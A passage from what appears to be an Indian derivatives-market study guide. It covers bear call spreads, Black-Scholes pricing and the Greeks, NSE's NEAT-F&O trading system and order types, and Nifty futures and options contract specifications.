5.4.5 Bear spreads - sell a call and buy another

There are times when you think the market is going to fall over the next two months; however, in the event that the market does not fall, you would like to limit your downside. One way you could do this is by entering into a spread. A spread trading strategy involves taking a position in two or more options of the same type, that is, two or more calls or two or more puts. A spread that is designed to profit if the price goes down is called a bear spread.

This is basically done by utilizing two call options having the same expiration date but different exercise prices. The buyer of a bear spread buys a call with an exercise price above the current index level and sells a call option with an exercise price below the current index level: in a bear spread, the strike price of the option purchased is greater than the strike price of the option sold. The trade is a spread because it involves buying one option and selling a related option; it is a bear spread because the trader hopes to profit from a fall in the index. A bear spread created using calls involves an initial cash inflow, since the price of the call sold is greater than the price of the call purchased. Compared to buying the index itself, the bear spread with call options limits the trader's risk, but it also limits the profit potential; in short, it limits both the upside potential and the downside risk. Figure 5.12 shows the payoff from the bear spread. Illustration 5.4 gives the profit/loss incurred on the spread position as the index changes.
Broadly, we can have three types of bear spreads:
1. Both calls initially out-of-the-money.
2. One call initially in-the-money and one call initially out-of-the-money.
3. Both calls initially in-the-money.
The decision about which of the three spreads to undertake depends upon how much risk the investor is willing to take. The most aggressive bear spreads are of type 1: they cost very little to set up, but have a very small probability of giving a high payoff. As we move from type 1 to type 2 and from type 2 to type 3, the spreads become more conservative and cost more to set up. Bear spreads can also be created by buying a put with a high strike price and selling a put with a low strike price.

Figure 5.12: Payoff for a bear spread created using call options. The figure shows the profits/losses for a bear spread built from two calls, one sold at Rs.150 (strike 3800) and the other bought at Rs.50 (strike 4200). The maximum gain from setting up the spread is Rs.100, the difference between the premium received for the call sold (Rs.150) and the premium paid for the call bought (Rs.50); the upside on the position is limited to this amount, which is also the initial cash inflow on the spread. As the index moves above 3800, the position starts making losses (cutting profits) until the spot reaches 4200. Beyond 4200, the profits made on the long call position get offset by the losses made on the short call position, effectively limiting the loss on the combination. The maximum loss on this spread is made if the index on the expiration day closes at or above 4200: at that point the loss on the two-call position together is Rs.400, i.e. (4200 - 3800); the initial inflow on the spread being Rs.100, the net loss turns out to be Rs.300. The downside on this spread position is limited to this amount. The payoff obtained is the sum of the payoffs of the two calls and hence lies between +100 and -300.

Illustration 5.4: Expiration day profit/loss for a bear spread using two-month calls (short 3800 call sold at Rs.150, long 4200 call bought at Rs.50; net premium inflow Rs.100):

Index at expiry | Profit
3700 | +100
3750 | +100
3800 | +100
3850 | +50
3900 | 0
3950 | -50
4000 | -100
4050 | -150
4100 | -200
4150 | -250
4200 | -300
4250 | -300
4300 | -300
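The bear spread's profit profile can be sketched in the same way as the bull spread. Illustrative only; strikes and premiums are those of the example above.

```python
def bear_spread_profit(index_at_expiry,
                       k_low=3800.0, k_high=4200.0,
                       premium_received=150.0, premium_paid=50.0):
    """Expiration-day profit of a bear call spread: short the k_low call,
    long the k_high call. Net premium inflow is received minus paid."""
    short_call = -max(index_at_expiry - k_low, 0.0)   # payoff of the call sold
    long_call = max(index_at_expiry - k_high, 0.0)    # payoff of the call bought
    return short_call + long_call + (premium_received - premium_paid)
```

Below 3800 the profit is pinned at the +100 inflow; at or above 4200 the loss is pinned at -300, matching Illustration 5.4.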
CHAPTER 6: Pricing of Options Contracts and Greek Letters

An option buyer has the right but not the obligation to exercise against the seller. This optionality is precious and has a value, which is expressed in terms of the option price. The worst that can happen to a buyer is the loss of the premium paid by him: his downside is limited to this premium, but his upside is potentially unlimited. Just as in other free markets, it is the supply and demand in the secondary market that drives the price of an option.

There are various models which help us get close to the true price of an option. The most popular among them are the binomial option pricing model and the much celebrated Black-Scholes model (developed in 1973). Today most calculators and spreadsheets come with a built-in Black-Scholes options pricing formula, so to price options we don't really need to memorize the formula; all we need to know is the variables that go into the model. This chapter first looks at the key variables affecting an option's price and the limits within which call and put option prices must lie. Thereafter we discuss the Black-Scholes option pricing model. The chapter ends with an overview of the option Greeks used for hedging portfolios with option contracts.

6.1 Variables affecting Option Pricing

Option prices are affected by six factors. These are the Spot Price (S), the Strike Price (X), the Volatility (σ) of the spot price, the Time to expiration of the contract (T), the risk-free rate of return (r), and Dividends on the asset (D).

The price of a call option rises with a rise in the spot price, since a rise in prices makes the option more likely to be exercised. It falls, however, with a rise in the strike price, as the payoff (S - X) falls. The opposite is true for the price of put options. The option price is higher for an option which has a longer period to expiry: the longer the term of an option, the higher the likelihood or probability that it will be exercised, and option prices accordingly tend to fall as contracts come close to expiry. It should be noted that this time factor is strictly applicable only for American options and not European types. A rise in the volatility level of the stock price leads to an increase in the price of both call and put options. A rise in the risk-free rate tends to increase the value of call options and decrease the value of put options. Finally, the price of a call option is negatively related to the size of anticipated dividends, while the price of a put option is positively related to the size of anticipated dividends.
All option contracts have price limits: one would pay at most a definite maximum, and at least a definite minimum, price for acquiring an option. For the sake of simplicity, the relationships below are written for options on non-dividend-paying stocks; in practice a minor adjustment is made in the formulae to calculate the price limits for options on dividend-paying stocks. The limits can be defined as follows:

(i) The maximum price of a call option can be the price of the underlying asset. In the case of stocks, a call option on a stock can never be priced higher than its spot price. This is true for both European and American call options.

(ii) The minimum price of a European call option is the difference between the spot price (S) and the present value of the strike price (X), where X has been discounted at the risk-free rate r. Symbolically, it can be written as S - Xe^(-rt).

(iii) The maximum price for a put option can never be more than the present value of the strike price X (discounted at the risk-free rate r). This is true for both types of options, European and American.

(iv) The minimum price of a European put option is the difference between the present value of the strike price and the spot price of the asset. This can be symbolically expressed as Xe^(-rt) - S. This is true only for European options.

6.2 The Black-Scholes-Merton Model for Option Pricing (BSO)

This model of option pricing was first presented in the articles "The Pricing of Options and Corporate Liabilities" by F. Black and M. Scholes, published in the Journal of Political Economy, and "Theory of Rational Option Pricing" by R. C. Merton, published in the Bell Journal of Economics and Management Science. It was later considered a major breakthrough in the area of option pricing and had a tremendous influence on the way traders price and hedge options. (F. Black died in 1995.)

The model is based on the premise that stock price changes are random in nature but lognormally distributed, and that technical analysis does not matter. According to the BSO model, the option price and the stock price depend on the same underlying source of uncertainty, and we can form a portfolio consisting of the stock and the option which eliminates this source of uncertainty. Such a portfolio is instantaneously riskless and must therefore instantaneously earn the risk-free rate. The result of this analysis is the Black-Scholes differential equation, which is given as (without proof):

∂f/∂t + rS ∂f/∂S + (1/2)σ²S² ∂²f/∂S² = rf        ...(6.1)

Here f is the option price, S is the stock price, t is time (the option's term, or time to maturity, being T), r is the risk-free rate, and σ is the volatility of the stock price.
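The price limits for European options can be checked numerically. A minimal sketch, assuming non-dividend-paying stocks as in the text (the function names are illustrative):

```python
import math

def call_price_limits(S, X, r, t):
    """No-arbitrage limits for a European call on a non-dividend-paying stock:
    lower bound S - X*e^(-rt) (floored at zero), upper bound the spot price S."""
    lower = max(S - X * math.exp(-r * t), 0.0)
    return lower, S

def put_price_limits(S, X, r, t):
    """European put: lower bound X*e^(-rt) - S (floored at zero),
    upper bound the present value of the strike."""
    pv_strike = X * math.exp(-r * t)
    return max(pv_strike - S, 0.0), pv_strike
```

Any quoted premium outside these bounds would admit a riskless arbitrage, which is why the text calls them definite maximum and minimum prices.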
The Black-Scholes formulas for the prices of European calls and puts with strike price X on a non-dividend-paying stock are solutions of the differential equation (6.1) and are given below (without proof):

c = S N(d1) - X e^(-rT) N(d2)
p = X e^(-rT) N(-d2) - S N(-d1)
where d1 = [ln(S/X) + (r + σ²/2)T] / (σ√T) and d2 = d1 - σ√T.

Here:
• N(x) is the cumulative distribution function for a standardized normal distribution.
• S is the spot price and X is the exercise price; ST denotes the spot price at time T.
• T is the time to expiration measured in years, and r is the risk-free rate. The Black-Scholes model uses continuous compounding, as discussed in Chapter 2.
• σ is a measure of volatility: the annualized standard deviation of continuously compounded returns on the underlying. When a daily sigma is given, it needs to be converted into an annualized sigma: sigma annual = sigma daily × √(number of trading days per year). On average there are 250 trading days in a year.

One need not remember the formulae or the equation, as several option price calculators are available freely (in spreadsheet formats also). The terms of the formula do have natural interpretations. The expression N(d2) is the probability that the option will be exercised in a risk-neutral world, so that X e^(-rT) N(d2) is the present value of the strike price times the probability that the strike price will be paid. The expression S0 N(d1) e^(rT) is the expected value, in a risk-neutral world, of a variable that equals ST if ST > X and is 0 otherwise.

When S becomes very large, a call option is almost certain to be exercised; it becomes similar to a forward contract with a delivery price X. Both N(d1) and N(d2) are then close to 1.0, and the call option price approaches c = S - X e^(-rT); the put option price approaches 0, as N(-d1) and N(-d2) are both close to 0. Similarly, when σ approaches zero, d1 and d2 tend to infinity, so that N(d1) and N(d2) tend to 1.0 and the value of the call option is again c = S - X e^(-rT). Thus the call price will always be at least max(S - X e^(-rT), 0).
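The formulas above translate directly into code. A minimal sketch using only the Python standard library, with the error function supplying the normal CDF (the helper names are illustrative):

```python
import math

def _norm_cdf(x):
    # Standard normal cumulative distribution function N(x), via erf.
    return 0.5 * (1.0 + math.erf(x / math.sqrt(2.0)))

def black_scholes(S, X, T, r, sigma):
    """European call and put prices on a non-dividend-paying stock:
    c = S N(d1) - X e^(-rT) N(d2),  p = X e^(-rT) N(-d2) - S N(-d1)."""
    d1 = (math.log(S / X) + (r + 0.5 * sigma ** 2) * T) / (sigma * math.sqrt(T))
    d2 = d1 - sigma * math.sqrt(T)
    call = S * _norm_cdf(d1) - X * math.exp(-r * T) * _norm_cdf(d2)
    put = X * math.exp(-r * T) * _norm_cdf(-d2) - S * _norm_cdf(-d1)
    return call, put

def annualize_sigma(daily_sigma, trading_days=250):
    # The text's convention: sigma_annual = sigma_daily * sqrt(trading days per year).
    return daily_sigma * math.sqrt(trading_days)
```

A quick sanity check is put-call parity: the call price minus the put price should equal S - X e^(-rT) for any volatility.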
6.3 The Greeks

Each Greek letter measures a different dimension of the risk in an option position. The aim of traders is to manage the Greeks in order to manage their overall portfolio. There are five Greeks used for hedging portfolios of options with underlying assets (index or individual stocks): delta, gamma, theta, vega and rho, each represented by a Greek letter (Δ, Γ, Θ, ν and ρ). These are used mainly by traders who have sold options in the market.

6.3.1 Delta (Δ)

In general, the delta (Δ) of a portfolio is the change in the value of the portfolio with respect to a change in the price of the underlying asset; the delta of a stock itself is 1. The delta of an option, on the other hand, is the rate of change of the option price with respect to the price of the underlying asset: Δ = ∂C/∂S, the change in the price of the call option per unit change in the spot. Expressed differently, it is the slope of the curve that relates the option price to the price of the underlying asset; Figure 6.1 shows the delta of a stock option as this slope. For example, suppose the Δ of a call option on a stock is 0.5. This means that when the stock price changes by one, the option price changes by about 0.5, or 50% of the change in the stock price.

The delta of a European call on a stock paying dividends at rate q is N(d1)e^(-qT); the delta of a European put is e^(-qT)[N(d1) - 1]. The Δ of a call is always positive and the Δ of a put is always negative. As the stock price (underlying asset) changes, the delta of the option also changes. In order to maintain delta at the same level, a given number of shares of the underlying asset need to be bought or sold in the market. Maintaining delta at the same level is known as delta neutrality or delta hedging.
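The closed-form deltas quoted above can be sketched directly. An illustrative sketch only: the dividend yield q defaults to zero, and the hedging helper (with its hypothetical lot-size parameter) simply scales delta up to a share count.

```python
import math

def _norm_cdf(x):
    # Standard normal CDF via the error function.
    return 0.5 * (1.0 + math.erf(x / math.sqrt(2.0)))

def call_delta(S, X, T, r, sigma, q=0.0):
    """Delta of a European call on a stock paying dividends at rate q: N(d1) e^(-qT)."""
    d1 = (math.log(S / X) + (r - q + 0.5 * sigma ** 2) * T) / (sigma * math.sqrt(T))
    return math.exp(-q * T) * _norm_cdf(d1)

def put_delta(S, X, T, r, sigma, q=0.0):
    # e^(-qT) [N(d1) - 1]; always negative.
    return call_delta(S, X, T, r, sigma, q) - math.exp(-q * T)

def delta_hedge_shares(option_delta, contracts, lot_size):
    """Shares of the underlying to sell (if positive) against a long option
    position of `contracts` contracts to bring its delta back to zero."""
    return option_delta * contracts * lot_size
```

With q = 0 the put delta is exactly the call delta minus one, which is the relationship implied by the two formulas in the text.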
6.3.2 Gamma (Γ)

Γ is the rate of change of the option's delta with respect to the price of the underlying asset. In other words, it is the second derivative of the option price with respect to the price of the underlying asset.

6.3.3 Theta (Θ)

The Θ of a portfolio of options is the rate of change of the value of the portfolio with respect to the passage of time, with all else remaining the same. Θ is also referred to as the time decay of the portfolio: it is the change in the portfolio value when one day passes with all else remaining the same. We can measure Θ either "per calendar day" or "per trading day". To obtain Θ per calendar day, the formula for theta must be divided by 365; to obtain Θ per trading day, it must be divided by 250.

6.3.4 Vega (ν)

The vega of a portfolio of derivatives is the rate of change in the value of the portfolio with respect to the volatility of the underlying asset. If ν is high in absolute terms, the portfolio's value is very sensitive to small changes in volatility. If ν is low in absolute terms, volatility changes have relatively little impact on the value of the portfolio.

6.3.5 Rho (ρ)

The ρ of a portfolio of options is the rate of change of the value of the portfolio with respect to the interest rate. It measures the sensitivity of the value of a portfolio to interest rates.
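The signs and rough magnitudes of these Greeks can be sanity-checked numerically by bumping each input of a Black-Scholes call price. This is an illustrative finite-difference sketch, not a production pricer; the step size h is a hypothetical choice.

```python
import math

def _norm_cdf(x):
    return 0.5 * (1.0 + math.erf(x / math.sqrt(2.0)))

def bs_call(S, X, T, r, sigma):
    # Black-Scholes European call on a non-dividend-paying stock.
    d1 = (math.log(S / X) + (r + 0.5 * sigma ** 2) * T) / (sigma * math.sqrt(T))
    d2 = d1 - sigma * math.sqrt(T)
    return S * _norm_cdf(d1) - X * math.exp(-r * T) * _norm_cdf(d2)

def greeks_fd(S, X, T, r, sigma, h=1e-4):
    """Finite-difference estimates of the Greeks of a European call.
    Theta is quoted per year; divide by 365 or 250 for a per-day figure."""
    price = bs_call(S, X, T, r, sigma)
    delta = (bs_call(S + h, X, T, r, sigma) - bs_call(S - h, X, T, r, sigma)) / (2 * h)
    gamma = (bs_call(S + h, X, T, r, sigma) - 2 * price + bs_call(S - h, X, T, r, sigma)) / h ** 2
    theta = -(bs_call(S, X, T + h, r, sigma) - price) / h   # time decay
    vega = (bs_call(S, X, T, r, sigma + h) - price) / h
    rho = (bs_call(S, X, T, r + h, sigma) - price) / h
    return {"delta": delta, "gamma": gamma, "theta": theta, "vega": vega, "rho": rho}
```

For a long call one expects delta between 0 and 1, positive gamma, vega and rho, and negative theta (the time decay the text describes).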
Chapter 7: Trading of Derivatives Contracts

This chapter provides an overview of the trading system for NSE's futures and options market. The first section describes the entities in the trading system, the basis of trading, the client-broker relationship in the derivatives segment, and order types and conditions. The second section describes the trader workstation, using screenshots of trading screens at NSE; it also describes how to place orders.

7.1 Futures and Options Trading System

The futures & options trading system of NSE, called the NEAT-F&O trading system, provides fully automated screen-based trading for index futures & options and stock futures & options on a nationwide basis, as well as an online monitoring and surveillance mechanism. It supports an order-driven market and provides complete transparency of trading operations. The software for the F&O market has been developed to facilitate efficient and transparent trading in futures and options instruments. It is similar to that used for trading equities in the cash market segment: keeping in view the familiarity of trading members with the current capital market trading system, modifications have been made to the existing capital market trading system to make it suitable for trading futures and options. The best way to get a feel of the trading system, however, is to actually watch the screen and observe trading.

7.1.1 Entities in the trading system

Following are the four entities in the trading system:

• Trading members: Trading members are members of NSE. They can trade either on their own account or on behalf of their clients, including participants. The exchange assigns a trading member ID to each trading member. Each trading member can have more than one user; the number of users allowed for each trading member is notified by the exchange from time to time. Each user of a trading member must be registered with the exchange and is assigned a unique user ID. The unique trading member ID functions as a reference for all orders/trades of the different users; this ID is common for all users of a particular trading member. It is the responsibility of the trading member to maintain adequate control over persons having access to the firm's user IDs.

• Clearing members: Clearing members are members of NSCCL. They carry out risk management activities and confirmation/inquiry of trades through the trading system.

• Professional clearing members: A professional clearing member is a clearing member who is not a trading member. Typically, banks and custodians become professional clearing members and clear and settle for their trading members.
• Participants: A participant is a client of trading members, like a financial institution. These clients may trade through multiple trading members but settle through a single clearing member.

7.1.2 Basis of trading

The NEAT F&O system supports an order-driven market, wherein orders match automatically. Order matching is essentially on the basis of security, its price, time and quantity. All quantity fields are in units and prices in rupees. The exchange notifies the regular lot size and tick size for each of the contracts traded on this segment from time to time. When any order enters the trading system, it is an active order: it tries to find a match on the other side of the book. If it finds a match, a trade is generated. If it does not find a match, the order becomes passive and goes and sits in the respective outstanding order book in the system.

7.1.3 Corporate hierarchy

In the F&O trading software, a trading member has the facility of defining a hierarchy amongst the users of the system. This hierarchy comprises corporate manager, branch manager, dealer and admin:

• Corporate manager: The term is assigned to a user placed at the highest level in a trading firm. Such a user can perform all the functions, such as order and trade related activities of all users, can view the net position of all dealers and at all clients' level, and can receive end-of-day consolidated trade and order reports, dealer-wise, for all branches of the trading member firm and for all dealers of the firm. Only a corporate manager can sign off any user and also define exposure limits for the branches of the firm and its dealers.

• Branch manager: This term is assigned to a user who is placed under the corporate manager. Such a user can perform and view order and trade related activities for all dealers under that branch.

• Dealer: Dealers are users at the bottom of the hierarchy. A dealer can perform and view order and trade related activities only for himself and does not have access to information on other dealers under either the same branch or other branches.

• Admin: Another user type, 'Admin', is provided to every trading member along with the corporate manager user. This user type facilitates the trading members and the clearing members to receive and capture, on a real-time basis, all the trades, exercise requests and give-up requests of all the users under them. The clearing members can receive and capture all the above information on a real-time basis for the members and participants linked to them. All this information is written to comma-separated files, which can be accessed by any other program on a real-time basis in read-only mode; this, however, does not affect the online data capture process. Besides this, admin users can take online backups, view previous trades, and view and upload net positions. 'Admin' users cannot, however, place any orders or modify and cancel them.
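The matching rule described above (an active order matching against the passive book on price-time priority, with trades occurring at the passive order's price) can be sketched as a toy limit order book. This is an illustrative sketch only, not the NEAT-F&O implementation; the class and method names are hypothetical.

```python
import heapq

class OrderBook:
    """Toy limit order book for one contract, matching on price-time priority."""

    def __init__(self):
        self._bids = []  # heap entries: (-price, seq, price, qty); top = best bid
        self._asks = []  # heap entries: (price, seq, price, qty); top = best ask
        self._seq = 0    # arrival counter: breaks ties at the same price (time priority)

    def submit(self, side, price, qty):
        """Match an incoming (active) order against the opposite side of the book.

        Returns the trades generated as (trade_price, quantity) pairs; any
        unmatched remainder becomes a passive order sitting in the book.
        """
        opposite = self._asks if side == "buy" else self._bids
        trades = []
        while qty > 0 and opposite:
            key, seq, best_price, best_qty = opposite[0]
            crosses = price >= best_price if side == "buy" else price <= best_price
            if not crosses:
                break
            fill = min(qty, best_qty)
            trades.append((best_price, fill))  # trade at the passive order's price
            qty -= fill
            if best_qty > fill:
                heapq.heapreplace(opposite, (key, seq, best_price, best_qty - fill))
            else:
                heapq.heappop(opposite)
        if qty > 0:  # unmatched portion goes into the outstanding order book
            self._seq += 1
            book = self._bids if side == "buy" else self._asks
            heapq.heappush(book, (-price if side == "buy" else price,
                                  self._seq, price, qty))
        return trades
```

A buy for 12 units against resting sells of 5 @ 100 and 10 @ 101 fills the cheaper passive order first, then the next-best price, illustrating the price-time priority rule.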
A brief description of the viewing facilities available to each type of user is given below:

• Clearing member corporate manager: Can view outstanding orders, previous trades and net positions of his client trading members by entering the TM ID (trading member identification) and leaving the branch ID and the dealer ID blank.

• Clearing member and trading member corporate manager: Can view: (a) outstanding orders, previous trades and net positions of his client trading members by entering the TM ID and leaving the branch ID and dealer ID blank; (b) outstanding orders, previous trades and net positions entered for himself by entering his own TM ID, branch ID and user ID (this is his default screen); (c) outstanding orders, previous trades and net positions entered for his branch by entering his TM ID and branch ID fields; (d) outstanding orders, previous trades and net positions entered for any of his users/dealers by entering his TM ID, branch ID and user ID.

• Clearing member and trading member dealer: Can only view requests entered by him.

• Trading member corporate manager: Can view: (a) outstanding requests and activity log for requests entered by him, by entering his own branch and user IDs; (b) outstanding requests entered by his users, either by filling the user ID field with a specific user or leaving it blank.

• Trading member branch manager: Can view: (a) outstanding requests and activity log for requests entered by him, by entering his own branch and user IDs (this is his default screen); (b) outstanding requests entered by his dealers and/or branch managers, by either entering the branch and/or user IDs or leaving them blank.

• Trading member dealer: Can only view requests entered by him.

The 'Admin' user can view give-up screens and exercise requests for all the users (corporate managers, branch managers and dealers) belonging to or linked to the member, and can view the relevant messages for trades, exercise and give-up requests in the message area. However, the 'Admin' user cannot put in any orders or modify and cancel them.
7.1.4 Client-broker relationship in the derivatives segment

A trading member must deal with clients subject to the following:
• Collection of adequate margins from the client.
• Maintaining a separate client bank account for the segregation of client money.
• Timely issue of contract notes as per the prescribed format to the client.
• Ensuring timely pay-in and pay-out of funds to and from the clients.
• Resolving complaints of clients, if any, at the earliest.
• Avoiding receipt and payment of cash, and dealing only through account payee cheques.
• Sending periodical statements of accounts to clients.
• Not charging excess brokerage.
• Maintaining unique client codes as per the regulations.

7.1.5 Order types and conditions

Orders can be entered with various conditions attached to them. These conditions are broadly divided into the following categories:
• Time conditions
• Price conditions
• Other conditions

Time conditions
Day order: A day order, as the name suggests, is an order which is valid for the day on which it is entered. If the order does not match during the day, the system cancels the order automatically at the end of the day.
Immediate or Cancel (IOC): An IOC order is matched as soon as it is released into the system, failing which the order is cancelled from the system. Partial match is possible for the order, and the unmatched portion of the order is cancelled immediately.
Price conditions
Stop-loss: This facility allows the user to release an order into the system after the market price of the security reaches or crosses a threshold price, called the trigger price. For example, if a stop-loss buy order has a trigger of 1027.00 and a limit price of 1030.00, and the market (last traded) price is 1023.00, then this order is released into the system once the market price reaches or exceeds 1027.00. It is then added to the regular lot book, with the time of triggering as the time stamp, as a limit order of 1030.00. For a stop-loss buy order, the trigger price has to be less than the limit price; for a stop-loss sell order, the trigger price has to be greater than the limit price.
Trigger price: The price at which an order gets triggered from the stop-loss book.
Limit price: The price of the order after it is triggered from the stop-loss book.

Other conditions
Market price: Market orders are orders for which no price is specified at the time the order is entered (i.e. the price is the market price). For such orders, the system determines the price.
Pro: 'Pro' means that the orders are entered on the trading member's own account.
Cli: 'Cli' means that the trading member enters the orders on behalf of a client.
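The stop-loss trigger rule from the example can be written as a small predicate. An illustrative sketch with a hypothetical function name; it reproduces the "reaches or crosses" condition for both sides.

```python
def stop_loss_triggered(side, trigger_price, last_traded_price):
    """A stop-loss buy is released when the market trades at or above the trigger;
    a stop-loss sell is released when it trades at or below the trigger."""
    if side == "buy":
        return last_traded_price >= trigger_price
    return last_traded_price <= trigger_price
```

With the text's numbers (buy trigger 1027.00, last traded price 1023.00), the order stays parked in the stop-loss book; once the market trades at 1027.00 or higher, it is released as a limit order at 1030.00.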
7.2 The Trader Workstation
7.2.1 The market watch window

As mentioned earlier, the best way to familiarize oneself with the screen and its various segments is to actually spend some time studying a live screen. In this section we shall restrict ourselves to understanding just two segments of the workstation screen: the market watch window and the inquiry window.

The market watch window is the third window from the top of the screen and is always visible to the user. This is the main window from the dealer's perspective. The purpose of market watch is to allow continuous monitoring of the contracts or securities that are of specific interest to the user; it displays trading information for the contracts selected by the user. The user also gets a broadcast of all the cash market securities on the screen. Display of trading information related to cash market securities is in "read only" format, i.e. the dealer can view the information on the cash market but cannot trade in those securities through the system.

7.2.2 Inquiry window

The inquiry window enables the user to view information such as Market by Price (MBP), Previous Trades (PT), Outstanding Orders (OO), Activity Log (AL), Order Status (OS), Market Movement (MM), Market Inquiry (MI), Net Position, Online Backup, Snap Quote (SQ), Multiple Index Inquiry, Most Active Security and so on. Relevant information for the selected contract/security can be viewed. We shall look in detail at the Market by Price (MBP) and the Market Inquiry (MI) screens.

Market by price (MBP): The purpose of the MBP is to enable the user to view passive orders in the market, aggregated at each price and displayed in order of best prices. The window can be invoked by pressing the [F6] key. If a particular contract or security is selected, the details of the selected contract or security default into the selection screen; otherwise the current position in the market watch defaults. Figure 7.1 gives a screenshot of the Market by Price window in NEAT F&O.

Market inquiry (MI): The market inquiry screen can be invoked by using the [F11] key. If a particular contract or security is selected, the details of the selected contract or security can be seen on this screen. This function is also available if the user selects the relevant securities for display on the market watch screen. Figure 7.2 shows the Market Inquiry screen of the NEAT F&O. The first line of the screen gives the instrument type, symbol, expiry, contract status, total traded quantity, life time high and life time low. The second line displays the closing price, open price, high price, low price, last traded price and an indicator of the net change from the closing price. The third line displays the last traded quantity, last traded time and the last traded date. The fourth line displays the closing open interest, the opening open interest, the day high open interest, the day low open interest, the current open interest, the life time high open interest, the life time low open interest and the net change from the closing open interest. The fifth line displays very important information, namely the carrying cost in percentage terms.
Figure 7.1: Market by price in NEAT F&O
Figure 7.2: Security/contract/portfolio entry screen in NEAT F&O
7.2.3 Placing orders on the trading system

For both the futures and the options market, while entering orders on the trading system, members are required to identify orders as being proprietary or client orders. Proprietary orders should be identified as 'Pro' and those of clients should be identified as 'Cli'. Apart from this, in the case of 'Cli' trades, the client account number should also be provided.

The futures market is a zero sum game, i.e. the total number of long positions in any contract always equals the total number of short positions in any contract. The total number of outstanding contracts (long/short) at any point in time is called the "open interest". This open interest figure is a good indicator of the liquidity in every contract. Based on studies carried out in international exchanges, it is found that open interest is maximum in near-month expiry contracts.

7.2.4 Market spread/combination order entry

The NEAT F&O trading system also enables the user to enter spread/combination trades. Figure 7.3 shows the spread/combination screen. This enables the user to input two or three orders simultaneously into the market. These orders will have the condition attached to them that unless and until the whole batch of orders finds a counter-match, they shall not be traded. This facilitates spread and combination trading strategies with minimum price risk. The combination orders are traded with an IOC attribute, whereas spread orders are traded with a 'day' order attribute.

Figure 7.3: Market spread/combination order entry
7.3 Futures and Options Market Instruments
The F&O segment of NSE provides trading facilities for the following derivative instruments:
1. Index based futures
2. Index based options
3. Individual stock options
4. Individual stock futures

7.3.1 Contract specifications for index futures
On NSE's platform one can trade in Nifty, CNX IT, BANK Nifty, Mini Nifty etc. futures contracts having one-month, two-month and three-month expiry cycles. All contracts expire on the last Thursday of every month. Thus a January expiration contract would expire on the last Thursday of January and a February expiry contract would cease trading on the last Thursday of February. On the Friday following the last Thursday, a new contract having a three-month expiry would be introduced for trading. Thus, at any point in time, three contracts would be available for trading, with the first contract expiring on the last Thursday of that month. Depending on the time period for which you want to take an exposure in index futures contracts, you can place buy and sell orders in the respective contracts.

On the recommendations given by the SEBI Derivatives Market Review Committee, NSE also introduced the 'Long Term Options Contracts' on S&P CNX Nifty for trading in the F&O segment. Now option contracts with a 3 year tenure are also available: there would be 3 quarterly expiries (March, June, September and December) and, after these, 5 following semi-annual months of the June/December cycle would be available.

The Instrument type refers to "Futures contract on index", the Contract symbol NIFTY denotes a "Futures contract on Nifty index", and the Expiry date represents the last date on which the contract will be available for trading, as shown in Figure 7.2. The permitted lot size is 50; if the index level is 5000, then the appropriate value of a single index futures contract would be Rs. 2,50,000. The minimum tick size for an index futures contract is 0.05 units. Thus a single move in the index value would imply a resultant gain or loss of Rs. 2.50 (i.e. 0.05*50 units) on an open position of 50 units.

Each futures contract has a separate limit order book. All passive orders are stacked in the system in terms of price-time priority and trades take place at the passive order price (similar to the existing capital market trading system). Table 7.1 gives the contract specifications for index futures trading on the NSE.
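The lot-size and tick-size arithmetic above can be sketched as follows (a minimal illustration; the lot size of 50 and tick of 0.05 are taken from the contract specification):

```python
# Notional value and per-tick P&L for an index futures contract.
LOT_SIZE = 50        # permitted lot size for Nifty futures (Table 7.1)
TICK_SIZE = 0.05     # minimum price step, in index points

def contract_value(index_level, lots=1):
    """Notional value of the position: index level x lot size x lots."""
    return index_level * LOT_SIZE * lots

def tick_pnl(units, ticks=1):
    """Gain/loss for a move of `ticks` minimum price steps on `units` units."""
    return ticks * TICK_SIZE * units

print(contract_value(5000))   # 250000.0 -> Rs. 2,50,000 per contract
print(tick_pnl(50))           # 2.5 -> Rs. 2.50 on an open position of 50 units
```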
Figure 7.4: Contract cycle

Figure 7.4 shows the contract cycle for futures contracts on NSE's derivatives market. As can be seen, at any given point of time, three contracts are available for trading - a near-month, a middle-month and a far-month. As the January contract expires on the last Thursday of the month, a new three-month contract starts trading from the following day, once more making available three index futures contracts for trading.

7.3.2 Contract specification for index options
On NSE's index options market, there are one-month, two-month and three-month expiry contracts with minimum nine different strikes available for trading. Hence, if there are three serial month contracts available and the scheme of strikes is 6-1-6, then there are minimum 3 x 13 x 2 (call and put options), i.e. 78 options contracts available on an index. All index options contracts are cash settled and expire on the last Thursday of the month. The clearing corporation does the novation. The minimum tick for an index options contract is Re. 0.05.

Option contracts are specified as follows: DATE-EXPIRYMONTH-YEAR-CALL/PUT-AMERICAN/EUROPEAN-STRIKE. For example, the European style call option contract on the Nifty index with a strike price of 5000 expiring on the 26th November 2009 is specified as '26NOV2009 5000 CE'. Just as in the case of futures contracts, each option product (for instance, the 26NOV2009 5000 CE) has its own order book and its own prices. Table 7.2 gives the contract specifications for index options trading on the NSE.
Table 7.1: Contract specification of S&P CNX Nifty Futures

Underlying index: S&P CNX Nifty
Exchange of trading: National Stock Exchange of India Limited
Security descriptor: FUTIDX
Contract size: Permitted lot size shall be 50 (minimum value Rs. 2 lakh)
Price steps: Re. 0.05
Price bands: Operating range of 10% of the base price
Trading cycle: The futures contracts will have a maximum of three-month trading cycle - the near month (one), the next month (two) and the far month (three). New contract will be introduced on the next trading day following the expiry of the near month contract.
Expiry day: The last Thursday of the expiry month or the previous trading day if the last Thursday is a trading holiday.
Settlement basis: Mark to market and final settlement will be cash settled on T+1 basis.
Settlement price: Daily settlement price will be the closing price of the futures contracts for the trading day, and the final settlement price shall be the closing value of the underlying index on the last trading day of such futures contract.
Table 7.2: Contract specification of S&P CNX Nifty Options

Underlying index: S&P CNX Nifty
Exchange of trading: National Stock Exchange of India Limited
Security descriptor: OPTIDX
Contract size: Permitted lot size shall be 50 (minimum value Rs. 2 lakh)
Price steps: Re. 0.05
Price bands: A contract specific price range based on its delta value, computed and updated on a daily basis.
Trading cycle: The options contracts will have a maximum of three-month trading cycle - the near month (one), the next month (two) and the far month (three). New contract will be introduced on the next trading day following the expiry of the near month contract. Also, long term options have 3 quarterly and 5 half-yearly expiries.
Expiry day: The last Thursday of the expiry month or the previous trading day if the last Thursday is a trading holiday.
Settlement basis: Cash settlement on T+1 basis.
Style of option: European
Strike price interval: Depending on the index level
Daily settlement price: Not applicable
Final settlement price: Closing value of the index on the last trading day.

Generation of strikes
